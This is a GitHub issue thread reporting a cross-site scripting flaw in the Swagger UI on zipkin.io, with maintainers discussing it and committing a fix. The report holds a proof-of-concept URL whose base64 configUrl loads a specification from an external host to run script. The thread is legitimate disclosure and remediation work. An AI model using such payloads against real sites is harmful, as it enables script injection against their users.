Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

xss at https://zipkin.io/zipkin-api/ #98

Closed
Iieitaimus opened this issue May 15, 2023 · 6 comments
Closed

xss at https://zipkin.io/zipkin-api/ #98

Iieitaimus opened this issue May 15, 2023 · 6 comments
Labels
bug help wanted

Comments

@Iieitaimus
Copy link

Describe the Bug

There is runing old Swagger-UI exposed at https://zipkin.io/zipkin-api/. Its possible to execute js.

Steps to Reproduce

POC alert box:

  1. Go to: https://zipkin.io/zipkin-api/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
@Iieitaimus Iieitaimus added the bug label May 15, 2023
@jcchavezs
Copy link
Contributor

Up to update the swagger UI?

@codefromthecrypt codefromthecrypt transferred this issue from openzipkin/zipkin Feb 18, 2024
@codefromthecrypt
Copy link
Member

gh-pages branch https://github.com/openzipkin/zipkin-api/tree/gh-pages is where the UI is, so help wanted updating it! cc @SamTV12345 if you have time.

Note that I have no guarantee that this will actually solve the XSS, so probably want to read the docs and see if there's a config required also, and if that config already exists for the current version we expose on the website.

@SamTV12345
Copy link

SamTV12345 commented Feb 19, 2024
edited
Loading

gh-pages branch https://github.com/openzipkin/zipkin-api/tree/gh-pages is where the UI is, so help wanted updating it! cc @SamTV12345 if you have time.

Note that I have no guarantee that this will actually solve the XSS, so probably want to read the docs and see if there's a config required also, and if that config already exists for the current version we expose on the website.

Could you please point me to how this API is built 😃 ? I found this library named Sway which hasn't received any update in 5 years.

@codefromthecrypt
Copy link
Member

sure.. here was my note on the last commit that did anything notable 72928f0 (remember the PR has to be on the gh-pages branch)

so, unzip a release and see if it fixes the XSS.. there may be some drift on changes. Anything not obviously ours it doesn't touch on unzip probably needs to be deleted (things that were from an old version) https://github.com/swagger-api/swagger-ui/releases

@SamTV12345 SamTV12345 mentioned this issue Feb 19, 2024
Closed
@codefromthecrypt
Copy link
Member

@SamTV12345 so simply using the new version of swagger didn't remove the XSS. Using "killing this XSS" as a goal, let's look into your custom build (from master). For example, possibly we can just remove the form and hard-code the swagger, as well source it locally vs via an absolute href.

Wanna go for it?

To actually deploy the whole site to GH pages, edit/rename build-bin/idl_to_gh_pages to build-bin/dist_to_gh_pages and make sure the IDL ends up in the dist ;)

@codefromthecrypt codefromthecrypt mentioned this issue Feb 20, 2024
Closed
codefromthecrypt pushed a commit that referenced this issue Mar 3, 2024
Removes the TopBar form
ec0f469 
This removes the TopBar form, which removes any XSS related to it, by
changing the swagger-initializer.js file. This is the simplest way to
achieve the goal as we already need a custom initializer.js regardless.

As this change is against the gh-pages branch, I can't also update
build-bin/README.md on master. I'll do that in a separate PR once it is
verified to fix the issue. We can also make a gh-pages workflow which
unpacks the default dist and applies this change.

Fixes #98

Signed-off-by: Adrian Cole <[email protected]>
@codefromthecrypt
Copy link
Member

note, the current deployed swagger UI is not popping this up https://zipkin.io/zipkin-api/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug help wanted
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@codefromthecrypt @jcchavezs @SamTV12345 @Iieitaimus